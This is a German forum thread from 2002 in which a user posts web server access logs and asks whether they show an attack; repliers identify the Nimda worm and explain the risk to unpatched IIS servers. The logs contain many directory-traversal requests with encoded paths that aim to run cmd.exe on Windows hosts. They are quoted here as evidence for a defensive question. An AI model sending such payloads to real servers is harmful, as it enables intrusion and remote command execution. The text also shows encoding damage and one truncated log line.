nicht angemeldet
Hackerangriff oder was ist das ?
Hallo Zusammen,
ich hab meinen lokalen Webserver fÃr Testzwecke mal Ãber dyndns zgÃnglich gemacht. In den Access logs finde ich nun die untenstehenden EintrÃge immer wieder.
Kann jemand was damit anfangen ? Sind das Hackversuche oder irgendsoein Wurm.Der PFad:
GET /c/winnt/system32/cmd.exe?/c+dir
existiert ja sogar, aber ich denke mal unter Linux kann man lange versuchen die cmd.exe der Windows partition aufzurufen :-) Oder sollte ich mich doch nicht so sehr in Sicherheit wiegen ?
Gruss
Marko
80.140.229.253 - - [10/Oct/2002:11:31:08 +0200] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 278
80.140.229.253 - - [10/Oct/2002:11:31:09 +0200] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 276
80.140.229.253 - - [10/Oct/2002:11:31:09 +0200] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
80.140.229.253 - - [10/Oct/2002:11:31:09 +0200] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 286
80.140.229.253 - - [10/Oct/2002:11:31:09 +0200] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
80.140.229.253 - - [10/Oct/2002:11:31:10 +0200] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
80.140.229.253 - - [10/Oct/2002:11:31:10 +0200] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 317
80.140.229.253 - - [10/Oct/2002:11:31:10 +0200] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.ex80.140.229.253 - - [10/Oct/2002:11:31:11 +0200] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
80.140.229.253 - - [10/Oct/2002:11:31:11 +0200] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
80.140.229.253 - - [10/Oct/2002:11:31:12 +0200] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
80.140.229.253 - - [10/Oct/2002:11:31:12 +0200] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 299
80.140.229.253 - - [10/Oct/2002:11:31:12 +0200] "GET /scripts/..%%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.140.229.253 - - [10/Oct/2002:11:31:12 +0200] "GET /scripts/..%%35c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 283
80.140.229.253 - - [10/Oct/2002:11:31:13 +0200] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
80.140.229.253 - - [10/Oct/2002:11:31:18 +0200] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 300
-
Moin!
Kann jemand was damit anfangen ? Sind das Hackversuche oder irgendsoein Wurm.
Ein Wurm, dessen Name mir einfach nicht einfällt.
GET /c/winnt/system32/cmd.exe?/c+dir
existiert ja sogar, aber ich denke mal unter Linux kann man lange versuchen die cmd.exe der Windows partition aufzurufen :-) Oder sollte ich mich doch nicht so sehr in Sicherheit wiegen ?
Wenn du Linux laufen hast, dann kann dir nichts passieren. Paß nur auf, dass du nicht aus Versehen ein ungeschütztes Windows online losläßt (sprich: Angegriffen wird Windows mit einem fehlerhaften IIS-Webserver - benutz' den lieber nicht, oder sorge dafür, das du den Fix installiert hast). Wenn unter Windows kein Webserver läuft, ist das auch in Ordnung - ohne Webserve kein Angriff.
- Sven Rautenberg
-
Tach auch,
Kann jemand was damit anfangen ? Sind das Hackversuche oder irgendsoein Wurm.
Ein Wurm, dessen Name mir einfach nicht einfällt.
Reicht das um die Erinnerung wachzurufen? http://www.google.com/search?q=nimbda
Den habe ich auch oefter in meinen Logfiles, ebenso wie die ewige Suche nach cgi-bin/formmail.pl oder cgi-bin/formmail.cgi und was es da sonst noch fuer Versionen gibt.
Gruss,
Armin-
Moin,
Reicht das um die Erinnerung wachzurufen? http://www.google.com/search?q=nimbda
Falls nicht, biete ich noch http://www.google.com/search?q=nimda (einfach mal rückwärts lesen)
*SCNR*
--
Henryk Plötz
Grüße aus Berlin
-
-
-
Hi Marko,
GET /c/winnt/system32/cmd.exe?/c+dir
es gibt sehr schöne Postings im Archiv zu diesem Suchbegriff.
Viele Grüße
Michael